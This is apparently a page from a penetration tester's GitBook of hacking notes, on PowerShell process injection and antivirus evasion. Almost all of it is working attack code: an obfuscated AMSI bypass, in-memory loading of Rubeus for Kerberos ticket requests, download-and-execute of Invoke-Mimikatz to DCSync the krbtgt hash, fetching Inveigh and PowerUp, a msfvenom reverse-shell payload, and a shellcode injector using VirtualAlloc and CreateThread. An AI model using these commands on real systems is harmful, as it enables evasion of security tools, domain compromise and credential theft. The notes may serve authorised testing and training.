Hacking Notes
  • Ports & Enumeration
  • Antivirus Evasion
    • AMSI bypass
    • Macros / VBA
    • ETW bypass
    • EDR Evasion
    • EXE Packers
    • Powershell process-injection
    • Shellter
    • Payload generation
  • Port Forwarding
    • SSH
    • NetSH
    • Tools
    • Chisel
    • Meterpreter
  • Cloud
  • Word List Creation
  • Active Directory
    • Domain Enumeration
    • Domain Trusts
    • Domain Mapping
    • discretionary access control list (DACL)
      • ForceChangePassword
      • AddKeyLinkCredential
      • GenericWrite/ GenericAll
      • WriteOwner
      • GPO Exploitation
    • MS SQL
    • gMSA
    • Exchange
    • Group Exploitation
    • Domain Exploitation
    • Kerberos Attacks
    • SCCM
    • NTDS dumping
    • Impacket
    • ADCS exploitation
      • ESC 1
      • ESC4
      • ESC7
    • Privilege Escalation
      • Windows
        • System Enumeration
        • Credentials enumeration
        • Unsecure Service Path
        • Unsecure Path security
        • Misconfigured Reg
        • DLL Hijacking
        • Privilege enumeration
          • Tools
        • Vulnerable Apps
        • UAC Bypass
        • Service Enumeration
      • Unix
        • Linux Enumeration
        • Insecure File Permissions
        • Linux Escalate
        • Restricted shell escape
    • LAPS
  • Cloud
    • Azure
      • Tools
        • AzureCli - AZ
        • AzureCli - PowerShell
        • AzureAD
        • MicroBurst
        • SkyArk
        • PowerZure
        • BlueMap
        • AzureHound
        • BARK
        • GraphRunner
      • User attacks
        • CredMaster
        • TrevorSpray
      • o365
    • G-Cloud
    • Enumeration
      • AWS Cli
        • AWS Cli
      • Pacu
      • Organizational Trust
  • Web Application
    • Info
    • Log Poisoning / PHP Wrapping
    • HTTP Request Smuggling
    • Client Side Desync
    • Enumeration
    • Databases
    • SQL Injection
      • WAF Bypass
    • WebSocket
    • File Inclusion
    • Brute forcing
    • Cross Site Scripting (XSS)
  • Cracking
    • Hashcat
    • John The Ripper
    • Wireless
  • Wireless
    • Tools
    • WPS
    • WEP
    • WPA/ WPA-2/ WPA-3
    • WPA-Enterprise
    • PMKID
    • Captive Portal
  • DFIR
    • Forensics
      • Plaso
      • Microsoft
      • Windows
        • Anti-Forensics
        • Microsoft Forensics
          • ShimCache/ AppCompatCache
          • Defender
          • PowerShell / CMD
          • Registry
          • AmCache
          • Zone.Identifiers ADS
          • RecentFileCache
          • Prefetch
          • Lnk
          • Jumplist / RecentFiles
          • Shellbags
          • BAM/ DAM
          • SRUM
          • NTFS
          • EVTX
            • Security logs
            • WMI-Activity Operations
              • PowerShell/WinRM Operational
            • Task Scheduler
            • RDP Activity
            • Lateral Movement
          • hunting
          • Recycle Bin
          • Scheduled Tasks
        • o365
          • Mailbox Rules
      • Timeline Analysis
      • Forensics Tooling
        • Log2Timline / Plaso
        • Quarantine extraction
        • Scanning
          • Signature Scanning
          • AV Scanning
        • Logon Tracer
        • TimeSketch
        • Bulk_Extractor
        • FLS & Mactime
        • Manual Forensics
        • FTK
        • BulkExtractor & BulkExtractor-Rec
      • Linux
      • Azure
      • Active Directory
      • AnyDesk
    • Memory Analysis
      • Windows
        • Memory Acquisition
        • Code Injection
        • Rootkits
        • Rootkits
        • WMI/ PowerShell
        • Persistence & Lateral movement
        • Memory Acquisition
        • Baseliner
        • Identifying Code injection
        • Rookits
        • Process Objects
      • Tooling
        • Strings, bstrings and grep
        • Volatility
          • VolWeb
          • Memory Baseliner
        • MemProcFS
          • Code Injection
    • ReverseEngineering
    • Mobile
  • Networking
    • Radio
    • Vlans & Wired networking
    • Network Access Control
    • IPV6
    • Wireless
      • cracking
      • Aircrack-ng
      • WEP
      • WPA/ WPA2
      • WPA Enterprise
      • WPS
    • Bluetooth
  • Misc
    • Shells
      • WinRM / PowerShell
      • WinRM
      • Msfconsole
      • WinRM// PowerShell
      • Socat
      • Python
      • Netcat
      • PHP
      • Upgrade Shells
      • PowerCat
    • Buffer Overflow
      • General Information
      • Exploiting BufferOverflow
        • Find the Offset
        • Build the Exploit
        • Identifiy The BufferOverflow Character
        • Identify BadChars
        • Find the Jump Point
        • Generate Payload
        • Create Padding
    • Powershell
      • Quick Commands
      • Powershell Lateral Movement
    • Random Bits
    • Phishing
    • Coding
      • C#
    • Git
  • Command & Control
    • Meterpreter
    • Droppers
    • CobaltStrike
      • teamserver
      • Payload generation
        • Stagers
        • AV/EDR Bypass
          • Obfuscation
          • Sandbox Evasion
          • Win32 API
          • EDR Evasion
          • Encrypters
      • Listeners
      • Malleable Profiles
      • Initial Acces / Aggressors
      • Beacon Object Files (BOF)
      • Cheatsheet
    • Lateral Movement
    • Persistence
      • Low Priv User
      • High Priv User
  • Mobile App Testing
    • IOS
Powered by GitBook
On this page
Edit on GitHub
  1. Antivirus Evasion

Powershell process-injection

$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)

$x = (New-Object System.Net.WebClient).downloadData('https://path/to/rubeus.exe')

$xa = [System.Reflection.Assembly]::Load($x);[Rubeus.Program]::Main("
asktgt /user:<username> /password:<password> /enctype:aes256 
/domain:.local /dc:ad03.local
/createnetonly:C:\Windows\System32\cmd.exe".Split())

$xa = [System.Reflection.Assembly]::Load($x);[Rubeus.Program]::Main("
asktgt /user:<username> /password:<password> /enctype:aes256 
/domain:.local /dc:..local /ptt".Split())


-- If you still have a DA shell anywhere lets try get krbtgt via lsass --
$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true)

IEX((New-Object System.Net.WebClient).downloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'))

Invoke-Mimikatz -Command '"privilege::debug" "lsadump::dcsync /domain:.local /user:\krbtgt"'

Msf-venom:

AMSI bypass:

$xx = [Ref].Assembly.GetTypes(); Foreach($yy in $xx) {if ($yy.Name -like "*iUtils") {$vv = $yy}}; $ww = $vv.GetFields("NonPublic,Static"); Foreach ($uu in $ww) { if ($uu.Name -like "*nitFailed") {$ux = $uu}}; $ux.SetValue($null,$true); IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1'); Invoke-Inveigh; IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks

Msf-venom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.224 LPORT=8008 -f powershell

On windows :

p $code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
$winFunc =
Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
[Byte[]];
[Byte[]]$sc = <MSFVENOM OUTPUT>;
$size = 0x1000;
if ($sc.Length -gt 0x1000) {$size = $sc.Length};
$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 }
PreviousEXE PackersNextShellter

Last updated 2 years ago